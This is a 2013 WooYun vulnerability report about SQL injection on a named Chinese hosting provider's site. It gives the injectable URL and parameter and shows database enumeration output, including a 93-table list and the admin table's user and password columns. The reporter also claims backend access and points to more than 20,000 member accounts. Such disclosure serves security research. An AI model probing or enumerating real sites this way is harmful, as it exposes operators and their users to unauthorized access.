当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038231

漏洞标题:广深互联分站SQL注入(已进入后台)

相关厂商:广深互联

漏洞作者: m1x7e1

提交时间:2013-09-26 11:01

修复时间:2013-11-10 11:02

公开时间:2013-11-10 11:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

地址:http://phpweb.99idc.cn/webmall/query.php?catid=1
数据库错误 直接爆出网站路径。

0000.png


0001.png


0002.png


Database: phpweb
[93 tables]
+--------------------------+
| pwn_advs_duilian |
| pwn_advs_lb |
| pwn_advs_lbgroup |
| pwn_advs_link |
| pwn_advs_linkgroup |
| pwn_advs_logo |
| pwn_advs_movi |
| pwn_advs_pic |
| pwn_advs_pop |
| pwn_advs_text |
| pwn_base_admin |
| pwn_base_adminauth |
| pwn_base_adminmenu |
| pwn_base_adminrights |
| pwn_base_border |
| pwn_base_coltype |
| pwn_base_config |
| pwn_base_pageset |
| pwn_base_pagetemp |
| pwn_base_plus |
| pwn_base_plusdefault |
| pwn_base_plusplan |
| pwn_base_plusplanid |
| pwn_base_plustemp |
| pwn_base_version |
| pwn_comment |
| pwn_comment_cat |
| pwn_comment_config |
| pwn_down_cat |
| pwn_down_con |
| pwn_down_config |
| pwn_down_downlog |
| pwn_down_pages |
| pwn_down_pcat |
| pwn_down_proj |
| pwn_down_prop |
| pwn_maq |
| pwn_maq_cat |
| pwn_maq_config |
| pwn_member |
| pwn_member_buylist |
| pwn_member_cat |
| pwn_member_centlog |
| pwn_member_centrule |
| pwn_member_centset |
| pwn_member_config |
| pwn_member_defaultrights |
| pwn_member_fav |
| pwn_member_friends |
| pwn_member_group |
| pwn_member_msn |
| pwn_member_notice |
| pwn_member_nums |
| pwn_member_onlinepay |
| pwn_member_pay |
| pwn_member_paycenter |
| pwn_member_regstep |
| pwn_member_rights |
| pwn_member_secure |
| pwn_member_type |
| pwn_member_zone |
| pwn_menu |
| pwn_menu_group |
| pwn_news_cat |
| pwn_news_con |
| pwn_news_config |
| pwn_news_downlog |
| pwn_news_pages |
| pwn_news_pcat |
| pwn_news_proj |
| pwn_news_prop |
| pwn_page |
| pwn_page_group |
| pwn_tools_code |
| pwn_tools_photopolldata |
| pwn_tools_photopollindex |
| pwn_tools_pollconfig |
| pwn_tools_polldata |
| pwn_tools_pollindex |
| pwn_tools_statbase |
| pwn_tools_statcome |
| pwn_tools_statcount |
| pwn_tools_statdate |
| pwn_webmall_config |
| pwn_webmall_goods |
| pwn_webmall_iorder |
| pwn_webmall_modules |
| pwn_webmall_spool |
| pwn_webmall_spoolmod |
| pwn_webmall_tempcat |
| pwn_webmall_temptype |
| pwn_webmall_tmod |
| pwn_webmall_torder |
+--------------------------+


Database: phpweb
Table: pwn_base_admin
[7 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(6) |
| job | varchar(50) |
| jobid | varchar(20) |
| moveable | int(1) |
| name | varchar(50) |
| password | varchar(50) |
| user | varchar(30) |
+----------+-------------+


0003.png


两万多会员账户。不过好像没什么用。。

漏洞证明:

见详细说明。

修复方案:

管理员会修复的。

版权声明:转载请注明来源 m1x7e1@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论